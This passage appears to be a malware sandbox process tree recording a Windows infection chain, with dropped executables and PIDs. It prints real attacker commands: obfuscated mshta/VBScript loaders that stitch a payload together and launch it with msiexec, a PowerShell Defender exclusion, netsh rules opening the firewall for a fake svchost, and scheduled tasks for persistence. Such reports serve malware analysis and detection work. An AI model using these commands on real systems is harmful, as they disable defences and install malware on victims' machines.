                                                                                                                                                                                                                                        "C:\Users\Admin\AppData\Roaming\Calculator\Calculator.exe" --type=utility --utility-sub-type=network.mojom.NetworkService --field-trial-handle=1672,5854799455816390656,6244105331867913633,131072 --lang=en-US --service-sandbox-type=network --no-sandbox --user-data-dir="C:\Users\Admin\AppData\Local\Calculator\User Data" --nwapp-path="C:\Users\Admin\AppData\Local\Temp\nw11000_164015626" --mojo-platform-channel-handle=1680 /prefetch:8
                                                                                                                                                                                                                                        11⤵
                                                                                                                                                                                                                                          PID:12236
                                                                                                                                                                                                                                  • C:\Users\Admin\Pictures\Adobe Films\FWhv9XPI2tB1uLEMqeR72GYB.exe
                                                                                                                                                                                                                                    "C:\Users\Admin\Pictures\Adobe Films\FWhv9XPI2tB1uLEMqeR72GYB.exe"
                                                                                                                                                                                                                                    8⤵
                                                                                                                                                                                                                                      PID:8580
                                                                                                                                                                                                                                      • C:\Users\Admin\AppData\Local\Temp\is-SOR96.tmp\FWhv9XPI2tB1uLEMqeR72GYB.tmp
                                                                                                                                                                                                                                        "C:\Users\Admin\AppData\Local\Temp\is-SOR96.tmp\FWhv9XPI2tB1uLEMqeR72GYB.tmp" /SL5="$20752,506127,422400,C:\Users\Admin\Pictures\Adobe Films\FWhv9XPI2tB1uLEMqeR72GYB.exe"
                                                                                                                                                                                                                                        9⤵
                                                                                                                                                                                                                                          PID:7720
                                                                                                                                                                                                                                          • C:\Users\Admin\AppData\Local\Temp\is-TAJPL.tmp\DYbALA.exe
                                                                                                                                                                                                                                            "C:\Users\Admin\AppData\Local\Temp\is-TAJPL.tmp\DYbALA.exe" /S /UID=2709
                                                                                                                                                                                                                                            10⤵
                                                                                                                                                                                                                                              PID:9284
                                                                                                                                                                                                                                              • C:\Program Files\Microsoft Office\HYFAWAPQZP\foldershare.exe
                                                                                                                                                                                                                                                "C:\Program Files\Microsoft Office\HYFAWAPQZP\foldershare.exe" /VERYSILENT
                                                                                                                                                                                                                                                11⤵
                                                                                                                                                                                                                                                  PID:6704
                                                                                                                                                                                                                                                • C:\Users\Admin\AppData\Local\Temp\81-cb7c0-569-e70a0-5d9e6473d7236\Laruzheraelu.exe
                                                                                                                                                                                                                                                  "C:\Users\Admin\AppData\Local\Temp\81-cb7c0-569-e70a0-5d9e6473d7236\Laruzheraelu.exe"
                                                                                                                                                                                                                                                  11⤵
                                                                                                                                                                                                                                                    PID:9964
                                                                                                                                                                                                                                                  • C:\Users\Admin\AppData\Local\Temp\3d-ba936-3f4-dc290-d8ba30ff2527b\Sycafuqowy.exe
                                                                                                                                                                                                                                                    "C:\Users\Admin\AppData\Local\Temp\3d-ba936-3f4-dc290-d8ba30ff2527b\Sycafuqowy.exe"
                                                                                                                                                                                                                                                    11⤵
                                                                                                                                                                                                                                                      PID:10064
                                                                                                                                                                                                                                                      • C:\Windows\System32\cmd.exe
                                                                                                                                                                                                                                                        "C:\Windows\System32\cmd.exe" /k C:\Users\Admin\AppData\Local\Temp\zz1szwzc.ssa\GcleanerEU.exe /eufive & exit
                                                                                                                                                                                                                                                        12⤵
                                                                                                                                                                                                                                                          PID:15336
                                                                                                                                                                                                                                                          • C:\Users\Admin\AppData\Local\Temp\zz1szwzc.ssa\GcleanerEU.exe
                                                                                                                                                                                                                                                            C:\Users\Admin\AppData\Local\Temp\zz1szwzc.ssa\GcleanerEU.exe /eufive
                                                                                                                                                                                                                                                            13⤵
                                                                                                                                                                                                                                                              PID:15368
                                                                                                                                                                                                                                                              • C:\Windows\SysWOW64\cmd.exe
                                                                                                                                                                                                                                                                "C:\Windows\System32\cmd.exe" /c taskkill /im "GcleanerEU.exe" /f & erase "C:\Users\Admin\AppData\Local\Temp\zz1szwzc.ssa\GcleanerEU.exe" & exit
                                                                                                                                                                                                                                                                14⤵
                                                                                                                                                                                                                                                                  PID:12380
                                                                                                                                                                                                                                                                  • C:\Windows\SysWOW64\taskkill.exe
                                                                                                                                                                                                                                                                    taskkill /im "GcleanerEU.exe" /f
                                                                                                                                                                                                                                                                    15⤵
                                                                                                                                                                                                                                                                    • Kills process with taskkill
                                                                                                                                                                                                                                                                    PID:12752
                                                                                                                                                                                                                                                            • C:\Windows\System32\cmd.exe
                                                                                                                                                                                                                                                              "C:\Windows\System32\cmd.exe" /k C:\Users\Admin\AppData\Local\Temp\0trz03iq.3n1\installer.exe /qn CAMPAIGN="654" & exit
                                                                                                                                                                                                                                                              12⤵
                                                                                                                                                                                                                                                                PID:15332
                                                                                                                                                                                                                                                                • C:\Users\Admin\AppData\Local\Temp\0trz03iq.3n1\installer.exe
                                                                                                                                                                                                                                                                  C:\Users\Admin\AppData\Local\Temp\0trz03iq.3n1\installer.exe /qn CAMPAIGN="654"
                                                                                                                                                                                                                                                                  13⤵
                                                                                                                                                                                                                                                                    PID:8024
                                                                                                                                                                                                                                                                • C:\Windows\System32\cmd.exe
                                                                                                                                                                                                                                                                  "C:\Windows\System32\cmd.exe" /k C:\Users\Admin\AppData\Local\Temp\54a0y4l2.k3m\any.exe & exit
                                                                                                                                                                                                                                                                  12⤵
                                                                                                                                                                                                                                                                    PID:15460
                                                                                                                                                                                                                                                                    • C:\Users\Admin\AppData\Local\Temp\54a0y4l2.k3m\any.exe
                                                                                                                                                                                                                                                                      C:\Users\Admin\AppData\Local\Temp\54a0y4l2.k3m\any.exe
                                                                                                                                                                                                                                                                      13⤵
                                                                                                                                                                                                                                                                        PID:12888
                                                                                                                                                                                                                                                                    • C:\Windows\System32\cmd.exe
                                                                                                                                                                                                                                                                      "C:\Windows\System32\cmd.exe" /k C:\Users\Admin\AppData\Local\Temp\jsb5lakd.gqa\gcleaner.exe /mixfive & exit
                                                                                                                                                                                                                                                                      12⤵
                                                                                                                                                                                                                                                                        PID:15524
                                                                                                                                                                                                                                                                        • C:\Users\Admin\AppData\Local\Temp\jsb5lakd.gqa\gcleaner.exe
                                                                                                                                                                                                                                                                          C:\Users\Admin\AppData\Local\Temp\jsb5lakd.gqa\gcleaner.exe /mixfive
                                                                                                                                                                                                                                                                          13⤵
                                                                                                                                                                                                                                                                            PID:16108
                                                                                                                                                                                                                                                                            • C:\Windows\SysWOW64\cmd.exe
                                                                                                                                                                                                                                                                              "C:\Windows\System32\cmd.exe" /c taskkill /im "gcleaner.exe" /f & erase "C:\Users\Admin\AppData\Local\Temp\jsb5lakd.gqa\gcleaner.exe" & exit
                                                                                                                                                                                                                                                                              14⤵
                                                                                                                                                                                                                                                                                PID:12660
                                                                                                                                                                                                                                                                                • C:\Windows\SysWOW64\taskkill.exe
                                                                                                                                                                                                                                                                                  taskkill /im "gcleaner.exe" /f
                                                                                                                                                                                                                                                                                  15⤵
                                                                                                                                                                                                                                                                                  • Kills process with taskkill
                                                                                                                                                                                                                                                                                  PID:13216
                                                                                                                                                                                                                                                                          • C:\Windows\System32\cmd.exe
                                                                                                                                                                                                                                                                            "C:\Windows\System32\cmd.exe" /k C:\Users\Admin\AppData\Local\Temp\rvkr1lcn.bk3\autosubplayer.exe /S & exit
                                                                                                                                                                                                                                                                            12⤵
                                                                                                                                                                                                                                                                              PID:15884
                                                                                                                                                                                                                                                                              • C:\Users\Admin\AppData\Local\Temp\rvkr1lcn.bk3\autosubplayer.exe
                                                                                                                                                                                                                                                                                C:\Users\Admin\AppData\Local\Temp\rvkr1lcn.bk3\autosubplayer.exe /S
                                                                                                                                                                                                                                                                                13⤵
                                                                                                                                                                                                                                                                                  PID:16284
                                                                                                                                                                                                                                                                                  • C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe
                                                                                                                                                                                                                                                                                    powershell -inputformat none -ExecutionPolicy RemoteSigned -File "C:\Users\Admin\AppData\Local\Temp\nso3F9A.tmp\tempfile.ps1"
                                                                                                                                                                                                                                                                                    14⤵
                                                                                                                                                                                                                                                                                      PID:10604
                                                                                                                                                                                                                                                                      • C:\Windows\SysWOW64\schtasks.exe
                                                                                                                                                                                                                                                                        schtasks /create /f /RU "Admin" /tr "C:\Program Files (x86)\PowerControl\PowerControl_Svc.exe" /tn "PowerControl LG" /sc ONLOGON /rl HIGHEST
                                                                                                                                                                                                                                                                        7⤵
                                                                                                                                                                                                                                                                        • Creates scheduled task(s)
                                                                                                                                                                                                                                                                        PID:6456
                                                                                                                                                                                                                                                                      • C:\Windows\SysWOW64\schtasks.exe
                                                                                                                                                                                                                                                                        schtasks /create /f /RU "Admin" /tr "C:\Program Files (x86)\PowerControl\PowerControl_Svc.exe" /tn "PowerControl HR" /sc HOURLY /rl HIGHEST
                                                                                                                                                                                                                                                                        7⤵
                                                                                                                                                                                                                                                                        • Creates scheduled task(s)
                                                                                                                                                                                                                                                                        PID:5664
                                                                                                                                                                                                                                                                    • C:\Users\Admin\Pictures\Adobe Films\mjeNf8YrtejDsReEKCLLAvuO.exe
                                                                                                                                                                                                                                                                      "C:\Users\Admin\Pictures\Adobe Films\mjeNf8YrtejDsReEKCLLAvuO.exe"
                                                                                                                                                                                                                                                                      6⤵
                                                                                                                                                                                                                                                                        PID:6896
                                                                                                                                                                                                                                                                      • C:\Users\Admin\Pictures\Adobe Films\ONcgcjSMGSkVE6lavV_NePua.exe
                                                                                                                                                                                                                                                                        "C:\Users\Admin\Pictures\Adobe Films\ONcgcjSMGSkVE6lavV_NePua.exe"
                                                                                                                                                                                                                                                                        6⤵
                                                                                                                                                                                                                                                                          PID:6964
                                                                                                                                                                                                                                                                          • C:\Windows\SysWOW64\cmd.exe
                                                                                                                                                                                                                                                                            "C:\Windows\System32\cmd.exe" /c taskkill /im ONcgcjSMGSkVE6lavV_NePua.exe /f & timeout /t 6 & del /f /q "C:\Users\Admin\Pictures\Adobe Films\ONcgcjSMGSkVE6lavV_NePua.exe" & del C:\ProgramData\*.dll & exit
                                                                                                                                                                                                                                                                            7⤵
                                                                                                                                                                                                                                                                              PID:2472
                                                                                                                                                                                                                                                                              • C:\Windows\SysWOW64\taskkill.exe
                                                                                                                                                                                                                                                                                taskkill /im ONcgcjSMGSkVE6lavV_NePua.exe /f
                                                                                                                                                                                                                                                                                8⤵
                                                                                                                                                                                                                                                                                • Kills process with taskkill
                                                                                                                                                                                                                                                                                PID:992
                                                                                                                                                                                                                                                                          • C:\Users\Admin\Pictures\Adobe Films\thqLUFXjb0avcgr4Ff2QIILe.exe
                                                                                                                                                                                                                                                                            "C:\Users\Admin\Pictures\Adobe Films\thqLUFXjb0avcgr4Ff2QIILe.exe"
                                                                                                                                                                                                                                                                            6⤵
                                                                                                                                                                                                                                                                              PID:7076
                                                                                                                                                                                                                                                                              • C:\Program Files (x86)\Company\NewProduct\inst3.exe
                                                                                                                                                                                                                                                                                "C:\Program Files (x86)\Company\NewProduct\inst3.exe"
                                                                                                                                                                                                                                                                                7⤵
                                                                                                                                                                                                                                                                                  PID:6312
                                                                                                                                                                                                                                                                                • C:\Program Files (x86)\Company\NewProduct\DownFlSetup999.exe
                                                                                                                                                                                                                                                                                  "C:\Program Files (x86)\Company\NewProduct\DownFlSetup999.exe"
                                                                                                                                                                                                                                                                                  7⤵
                                                                                                                                                                                                                                                                                    PID:6404
                                                                                                                                                                                                                                                                                  • C:\Program Files (x86)\Company\NewProduct\cutm3.exe
                                                                                                                                                                                                                                                                                    "C:\Program Files (x86)\Company\NewProduct\cutm3.exe"
                                                                                                                                                                                                                                                                                    7⤵
                                                                                                                                                                                                                                                                                      PID:5020
                                                                                                                                                                                                                                                                                  • C:\Users\Admin\Pictures\Adobe Films\tzhXPiwxaSuXjvgggWPEBDSn.exe
                                                                                                                                                                                                                                                                                    "C:\Users\Admin\Pictures\Adobe Films\tzhXPiwxaSuXjvgggWPEBDSn.exe"
                                                                                                                                                                                                                                                                                    6⤵
                                                                                                                                                                                                                                                                                      PID:7096
                                                                                                                                                                                                                                                                                      • C:\Windows\SysWOW64\WerFault.exe
                                                                                                                                                                                                                                                                                        C:\Windows\SysWOW64\WerFault.exe -u -p 7096 -s 660
                                                                                                                                                                                                                                                                                        7⤵
                                                                                                                                                                                                                                                                                        • Program crash
                                                                                                                                                                                                                                                                                        PID:7672
                                                                                                                                                                                                                                                                                      • C:\Windows\SysWOW64\WerFault.exe
                                                                                                                                                                                                                                                                                        C:\Windows\SysWOW64\WerFault.exe -u -p 7096 -s 680
                                                                                                                                                                                                                                                                                        7⤵
                                                                                                                                                                                                                                                                                        • Program crash
                                                                                                                                                                                                                                                                                        PID:8116
                                                                                                                                                                                                                                                                                      • C:\Windows\SysWOW64\WerFault.exe
                                                                                                                                                                                                                                                                                        C:\Windows\SysWOW64\WerFault.exe -u -p 7096 -s 644
                                                                                                                                                                                                                                                                                        7⤵
                                                                                                                                                                                                                                                                                        • Program crash
                                                                                                                                                                                                                                                                                        PID:7496
                                                                                                                                                                                                                                                                                      • C:\Windows\SysWOW64\WerFault.exe
                                                                                                                                                                                                                                                                                        C:\Windows\SysWOW64\WerFault.exe -u -p 7096 -s 664
                                                                                                                                                                                                                                                                                        7⤵
                                                                                                                                                                                                                                                                                        • Program crash
                                                                                                                                                                                                                                                                                        PID:6972
                                                                                                                                                                                                                                                                                      • C:\Windows\SysWOW64\WerFault.exe
                                                                                                                                                                                                                                                                                        C:\Windows\SysWOW64\WerFault.exe -u -p 7096 -s 752
                                                                                                                                                                                                                                                                                        7⤵
                                                                                                                                                                                                                                                                                        • Program crash
                                                                                                                                                                                                                                                                                        PID:5064
                                                                                                                                                                                                                                                                                    • C:\Users\Admin\Pictures\Adobe Films\hIQcqXQv_K62G4yPMndMZZKq.exe
                                                                                                                                                                                                                                                                                      "C:\Users\Admin\Pictures\Adobe Films\hIQcqXQv_K62G4yPMndMZZKq.exe"
                                                                                                                                                                                                                                                                                      6⤵
                                                                                                                                                                                                                                                                                        PID:5008
                                                                                                                                                                                                                                                                                        • C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe
                                                                                                                                                                                                                                                                                          "C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe" Add-MpPreference -ExclusionPath c:\windows\
                                                                                                                                                                                                                                                                                          7⤵
                                                                                                                                                                                                                                                                                            PID:7312
                                                                                                                                                                                                                                                                                          • C:\Windows\System32\netsh.exe
                                                                                                                                                                                                                                                                                            "C:\Windows\System32\netsh.exe" advfirewall firewall add rule name="SvcHostX" dir=in action=allow program="C:\Windows\System\svchost.exe" enable=yes
                                                                                                                                                                                                                                                                                            7⤵
                                                                                                                                                                                                                                                                                              PID:4552
                                                                                                                                                                                                                                                                                            • C:\Windows\System32\netsh.exe
                                                                                                                                                                                                                                                                                              "C:\Windows\System32\netsh.exe" advfirewall firewall add rule name="SvcHostX" dir=out action=allow program="C:\Windows\System\svchost.exe" enable=yes
                                                                                                                                                                                                                                                                                              7⤵
                                                                                                                                                                                                                                                                                                PID:6436
                                                                                                                                                                                                                                                                                            • C:\Users\Admin\Pictures\Adobe Films\aJ28VtTjRSZnt5dTwxYRl1Rk.exe
                                                                                                                                                                                                                                                                                              "C:\Users\Admin\Pictures\Adobe Films\aJ28VtTjRSZnt5dTwxYRl1Rk.exe"
                                                                                                                                                                                                                                                                                              6⤵
                                                                                                                                                                                                                                                                                                PID:4060
                                                                                                                                                                                                                                                                                              • C:\Users\Admin\Pictures\Adobe Films\QcSY6e_2AiBKGGYRqNzIRvah.exe
                                                                                                                                                                                                                                                                                                "C:\Users\Admin\Pictures\Adobe Films\QcSY6e_2AiBKGGYRqNzIRvah.exe"
                                                                                                                                                                                                                                                                                                6⤵
                                                                                                                                                                                                                                                                                                  PID:6236
                                                                                                                                                                                                                                                                                                • C:\Users\Admin\Pictures\Adobe Films\xcppdWmnNoemjy4i2ZKoqIp2.exe
                                                                                                                                                                                                                                                                                                  "C:\Users\Admin\Pictures\Adobe Films\xcppdWmnNoemjy4i2ZKoqIp2.exe"
                                                                                                                                                                                                                                                                                                  6⤵
                                                                                                                                                                                                                                                                                                    PID:2168
                                                                                                                                                                                                                                                                                                  • C:\Users\Admin\Pictures\Adobe Films\qYDVN5tTtoYWPLMTngD0JSXF.exe
                                                                                                                                                                                                                                                                                                    "C:\Users\Admin\Pictures\Adobe Films\qYDVN5tTtoYWPLMTngD0JSXF.exe"
                                                                                                                                                                                                                                                                                                    6⤵
                                                                                                                                                                                                                                                                                                      PID:5100
                                                                                                                                                                                                                                                                                                    • C:\Users\Admin\Pictures\Adobe Films\5cnhkQf4VtDCo3IPvf1yRxAd.exe
                                                                                                                                                                                                                                                                                                      "C:\Users\Admin\Pictures\Adobe Films\5cnhkQf4VtDCo3IPvf1yRxAd.exe"
                                                                                                                                                                                                                                                                                                      6⤵
                                                                                                                                                                                                                                                                                                        PID:6372
                                                                                                                                                                                                                                                                                                      • C:\Users\Admin\Pictures\Adobe Films\HIhCwEVlrwQYTzQJMUoV0B7N.exe
                                                                                                                                                                                                                                                                                                        "C:\Users\Admin\Pictures\Adobe Films\HIhCwEVlrwQYTzQJMUoV0B7N.exe"
                                                                                                                                                                                                                                                                                                        6⤵
                                                                                                                                                                                                                                                                                                          PID:6288
                                                                                                                                                                                                                                                                                                        • C:\Users\Admin\Pictures\Adobe Films\n80plkY7gX9DRffeGxF4r24C.exe
                                                                                                                                                                                                                                                                                                          "C:\Users\Admin\Pictures\Adobe Films\n80plkY7gX9DRffeGxF4r24C.exe"
                                                                                                                                                                                                                                                                                                          6⤵
                                                                                                                                                                                                                                                                                                            PID:4496
                                                                                                                                                                                                                                                                                                          • C:\Users\Admin\Pictures\Adobe Films\MOiCJsG0UqZXbmm5UReIPquK.exe
                                                                                                                                                                                                                                                                                                            "C:\Users\Admin\Pictures\Adobe Films\MOiCJsG0UqZXbmm5UReIPquK.exe"
                                                                                                                                                                                                                                                                                                            6⤵
                                                                                                                                                                                                                                                                                                              PID:2904
                                                                                                                                                                                                                                                                                                            • C:\Users\Admin\Pictures\Adobe Films\zT3C2bV2gmRqQaosw1Ox0shL.exe
                                                                                                                                                                                                                                                                                                              "C:\Users\Admin\Pictures\Adobe Films\zT3C2bV2gmRqQaosw1Ox0shL.exe"
                                                                                                                                                                                                                                                                                                              6⤵
                                                                                                                                                                                                                                                                                                                PID:6836
                                                                                                                                                                                                                                                                                                              • C:\Users\Admin\Pictures\Adobe Films\AQ_I3R69NJG_m4w14VMpsWDq.exe
                                                                                                                                                                                                                                                                                                                "C:\Users\Admin\Pictures\Adobe Films\AQ_I3R69NJG_m4w14VMpsWDq.exe"
                                                                                                                                                                                                                                                                                                                6⤵
                                                                                                                                                                                                                                                                                                                  PID:2300
                                                                                                                                                                                                                                                                                                                  • C:\Windows\SysWOW64\mshta.exe
                                                                                                                                                                                                                                                                                                                    "C:\Windows\System32\mshta.exe" VBsCRIPt:cLose ( creAteObjecT ("WScRipT.SHElL" ). RuN ( "CMd /r CopY /y ""C:\Users\Admin\Pictures\Adobe Films\AQ_I3R69NJG_m4w14VMpsWDq.exe"" 8pWB.eXE&& sTaRT 8pWB.eXe /pO_wtib1KE0hzl7U9_CYP & If """"== """" for %K iN ( ""C:\Users\Admin\Pictures\Adobe Films\AQ_I3R69NJG_m4w14VMpsWDq.exe"" ) do taskkill -im ""%~NxK"" -F " ,0, trUE ) )
                                                                                                                                                                                                                                                                                                                    7⤵
                                                                                                                                                                                                                                                                                                                      PID:7264
                                                                                                                                                                                                                                                                                                                      • C:\Windows\SysWOW64\cmd.exe
                                                                                                                                                                                                                                                                                                                        "C:\Windows\System32\cmd.exe" /r CopY /y "C:\Users\Admin\Pictures\Adobe Films\AQ_I3R69NJG_m4w14VMpsWDq.exe" 8pWB.eXE&& sTaRT 8pWB.eXe /pO_wtib1KE0hzl7U9_CYP &If ""== "" for %K iN ( "C:\Users\Admin\Pictures\Adobe Films\AQ_I3R69NJG_m4w14VMpsWDq.exe" ) do taskkill -im "%~NxK" -F
                                                                                                                                                                                                                                                                                                                        8⤵
                                                                                                                                                                                                                                                                                                                          PID:6720
                                                                                                                                                                                                                                                                                                                          • C:\Users\Admin\AppData\Local\Temp\8pWB.eXE
                                                                                                                                                                                                                                                                                                                            8pWB.eXe /pO_wtib1KE0hzl7U9_CYP
                                                                                                                                                                                                                                                                                                                            9⤵
                                                                                                                                                                                                                                                                                                                              PID:8100
                                                                                                                                                                                                                                                                                                                              • C:\Windows\SysWOW64\mshta.exe
                                                                                                                                                                                                                                                                                                                                "C:\Windows\System32\mshta.exe" VBsCRIPt:cLose ( creAteObjecT ("WScRipT.SHElL" ). RuN ( "CMd /r CopY /y ""C:\Users\Admin\AppData\Local\Temp\8pWB.eXE"" 8pWB.eXE&& sTaRT 8pWB.eXe /pO_wtib1KE0hzl7U9_CYP & If ""/pO_wtib1KE0hzl7U9_CYP ""== """" for %K iN ( ""C:\Users\Admin\AppData\Local\Temp\8pWB.eXE"" ) do taskkill -im ""%~NxK"" -F " ,0, trUE ) )
                                                                                                                                                                                                                                                                                                                                10⤵
                                                                                                                                                                                                                                                                                                                                  PID:5936
                                                                                                                                                                                                                                                                                                                                  • C:\Windows\SysWOW64\cmd.exe
                                                                                                                                                                                                                                                                                                                                    "C:\Windows\System32\cmd.exe" /r CopY /y "C:\Users\Admin\AppData\Local\Temp\8pWB.eXE" 8pWB.eXE&& sTaRT 8pWB.eXe /pO_wtib1KE0hzl7U9_CYP &If "/pO_wtib1KE0hzl7U9_CYP "== "" for %K iN ( "C:\Users\Admin\AppData\Local\Temp\8pWB.eXE" ) do taskkill -im "%~NxK" -F
                                                                                                                                                                                                                                                                                                                                    11⤵
                                                                                                                                                                                                                                                                                                                                      PID:2416
                                                                                                                                                                                                                                                                                                                                  • C:\Windows\SysWOW64\mshta.exe
                                                                                                                                                                                                                                                                                                                                    "C:\Windows\System32\mshta.exe" VbScRIpT: close (crEaTEOBject ( "WSCRIPt.SheLl" ). rUn ( "C:\Windows\system32\cmd.exe /c EcHO | seT /p = ""MZ"" > 1AQCPNL9.1 &CoPy /b /Y 1AqCPnL9.1 + HxU0.m + HR0NM.yl + _AECH.7 + ThBtZ22Y.U +1MRAv8.M + QZ5UW.aQ+ KKAyEq.00 N3V4H8H.sXy & STARt msiexec.exe -y .\N3V4H8H.SXY " , 0 , TruE ) )
                                                                                                                                                                                                                                                                                                                                    10⤵
                                                                                                                                                                                                                                                                                                                                      PID:4436
                                                                                                                                                                                                                                                                                                                                      • C:\Windows\SysWOW64\cmd.exe
                                                                                                                                                                                                                                                                                                                                        "C:\Windows\system32\cmd.exe" /c EcHO | seT /p = "MZ" > 1AQCPNL9.1 &CoPy /b /Y 1AqCPnL9.1 + HxU0.m + HR0NM.yl + _AECH.7 + ThBtZ22Y.U +1MRAv8.M + QZ5UW.aQ+ KKAyEq.00 N3V4H8H.sXy & STARt msiexec.exe -y .\N3V4H8H.SXY
                                                                                                                                                                                                                                                                                                                                        11⤵
                                                                                                                                                                                                                                                                                                                                          PID:5672
                                                                                                                                                                                                                                                                                                                                          • C:\Windows\SysWOW64\cmd.exe
                                                                                                                                                                                                                                                                                                                                            C:\Windows\system32\cmd.exe /S /D /c" EcHO "
                                                                                                                                                                                                                                                                                                                                            12⤵
                                                                                                                                                                                                                                                                                                                                              PID:9492
                                                                                                                                                                                                                                                                                                                                            • C:\Windows\SysWOW64\cmd.exe
                                                                                                                                                                                                                                                                                                                                              C:\Windows\system32\cmd.exe /S /D /c" seT /p = "MZ" 1>1AQCPNL9.1"
                                                                                                                                                                                                                                                                                                                                              12⤵
                                                                                                                                                                                                                                                                                                                                                PID:9528
                                                                                                                                                                                                                                                                                                                                              • C:\Windows\SysWOW64\msiexec.exe
                                                                                                                                                                                                                                                                                                                                                msiexec.exe -y .\N3V4H8H.SXY
                                                                                                                                                                                                                                                                                                                                                12⤵
                                                                                                                                                                                                                                                                                                                                                  PID:14800
                                                                                                                                                                                                                                                                                                                                          • C:\Windows\SysWOW64\taskkill.exe
                                                                                                                                                                                                                                                                                                                                            taskkill -im "AQ_I3R69NJG_m4w14VMpsWDq.exe" -F
                                                                                                                                                                                                                                                                                                                                            9⤵
                                                                                                                                                                                                                                                                                                                                            • Kills process with taskkill
                                                                                                                                                                                                                                                                                                                                            PID:8096
                                                                                                                                                                                                                                                                                                                                    • C:\Users\Admin\Pictures\Adobe Films\SCs8iAJaRFYrygLwD7sRN0st.exe
                                                                                                                                                                                                                                                                                                                                      "C:\Users\Admin\Pictures\Adobe Films\SCs8iAJaRFYrygLwD7sRN0st.exe"
                                                                                                                                                                                                                                                                                                                                      6⤵
                                                                                                                                                                                                                                                                                                                                        PID:6688
                                                                                                                                                                                                                                                                                                                                        • C:\Users\Admin\AppData\Roaming\2991246.exe
                                                                                                                                                                                                                                                                                                                                          "C:\Users\Admin\AppData\Roaming\2991246.exe"
                                                                                                                                                                                                                                                                                                                                          7⤵
                                                                                                                                                                                                                                                                                                                                            PID:6780
                                                                                                                                                                                                                                                                                                                                          • C:\Users\Admin\AppData\Roaming\3758203.exe
                                                                                                                                                                                                                                                                                                                                            "C:\Users\Admin\AppData\Roaming\3758203.exe"
                                                                                                                                                                                                                                                                                                                                            7⤵
                                                                                                                                                                                                                                                                                                                                              PID:5984
                                                                                                                                                                                                                                                                                                                                            • C:\Users\Admin\AppData\Roaming\5396287.exe
                                                                                                                                                                                                                                                                                                                                              "C:\Users\Admin\AppData\Roaming\5396287.exe"
                                                                                                                                                                                                                                                                                                                                              7⤵
                                                                                                                                                                                                                                                                                                                                                PID:6740
                                                                                                                                                                                                                                                                                                                                              • C:\Users\Admin\AppData\Roaming\6033949.exe
                                                                                                                                                                                                                                                                                                                                                "C:\Users\Admin\AppData\Roaming\6033949.exe"
                                                                                                                                                                                                                                                                                                                                                7⤵
                                                                                                                                                                                                                                                                                                                                                  PID:4668
                                                                                                                                                                                                                                                                                                                                                • C:\Users\Admin\AppData\Roaming\4936525.exe
                                                                                                                                                                                                                                                                                                                                                  "C:\Users\Admin\AppData\Roaming\4936525.exe"
                                                                                                                                                                                                                                                                                                                                                  7⤵
                                                                                                                                                                                                                                                                                                                                                    PID:1348
                                                                                                                                                                                                                                                                                                                                                  • C:\Users\Admin\AppData\Roaming\1426400.exe
                                                                                                                                                                                                                                                                                                                                                    "C:\Users\Admin\AppData\Roaming\1426400.exe"
                                                                                                                                                                                                                                                                                                                                                    7⤵
                                                                                                                                                                                                                                                                                                                                                      PID:8104
                                                                                                                                                                                                                                                                                                                                                  • C:\Users\Admin\Pictures\Adobe Films\LwNFsKaJt7Pr5JOVSaFqKDYL.exe
                                                                                                                                                                                                                                                                                                                                                    "C:\Users\Admin\Pictures\Adobe Films\LwNFsKaJt7Pr5JOVSaFqKDYL.exe"
                                                                                                                                                                                                                                                                                                                                                    6⤵
                                                                                                                                                                                                                                                                                                                                                      PID:5584
                                                                                                                                                                                                                                                                                                                                                      • C:\Users\Admin\AppData\Roaming\Calculator\setup.exe
                                                                                                                                                                                                                                                                                                                                                        C:\Users\Admin\AppData\Roaming\Calculator\setup.exe -cid= -sid= -silent=1
                                                                                                                                                                                                                                                                                                                                                        7⤵
                                                                                                                                                                                                                                                                                                                                                          PID:8140
                                                                                                                                                                                                                                                                                                                                                          • C:\Users\Admin\AppData\Roaming\Calculator\Calculator.exe
                                                                                                                                                                                                                                                                                                                                                            "C:\Users\Admin\AppData\Roaming\Calculator\Calculator.exe" "--loGQqfG2tg"
                                                                                                                                                                                                                                                                                                                                                            8⤵
                                                                                                                                                                                                                                                                                                                                                              PID:5624
                                                                                                                                                                                                                                                                                                                                                              • C:\Users\Admin\AppData\Roaming\Calculator\Calculator.exe
                                                                                                                                                                                                                                                                                                                                                                C:\Users\Admin\AppData\Roaming\Calculator\Calculator.exe --type=crashpad-handler "--user-data-dir=C:\Users\Admin\AppData\Local\Calculator\User Data" /prefetch:7 --monitor-self-annotation=ptype=crashpad-handler "--database=C:\Users\Admin\AppData\Local\Calculator\User Data\Crashpad" "--metrics-dir=C:\Users\Admin\AppData\Local\Calculator\User Data" --annotation=plat=Win64 --annotation=prod=Calculator --annotation=ver=0.0.13 --initial-client-data=0x230,0x234,0x238,0x20c,0x23c,0x7ffda769dec0,0x7ffda769ded0,0x7ffda769dee0
                                                                                                                                                                                                                                                                                                                                                                9⤵
                                                                                                                                                                                                                                                                                                                                                                  PID:6936
                                                                                                                                                                                                                                                                                                                                                                • C:\Users\Admin\AppData\Roaming\Calculator\Calculator.exe
                                                                                                                                                                                                                                                                                                                                                                  "C:\Users\Admin\AppData\Roaming\Calculator\Calculator.exe" --type=renderer --no-sandbox --file-url-path-alias="/gen=C:\Users\Admin\AppData\Roaming\Calculator\gen" --js-flags=--expose-gc --no-zygote --register-pepper-plugins=widevinecdmadapter.dll;application/x-ppapi-widevine-cdm --field-trial-handle=1864,7491063861239833755,17021780520356857483,131072 --lang=en-US --user-data-dir="C:\Users\Admin\AppData\Local\Calculator\User Data" --nwapp-path="C:\Users\Admin\AppData\Local\Temp\nw5624_1860885952" --nwjs --extension-process --ppapi-flash-path=pepflashplayer.dll --ppapi-flash-version=32.0.0.223 --device-scale-factor=1 --num-raster-threads=1 --renderer-client-id=3 --mojo-platform-channel-handle=2260 /prefetch:1
                                                                                                                                                                                                                                                                                                                                                                  9⤵
                                                                                                                                                                                                                                                                                                                                                                    PID:7540
                                                                                                                                                                                                                                                                                                                                                                  • C:\Users\Admin\AppData\Roaming\Calculator\Calculator.exe
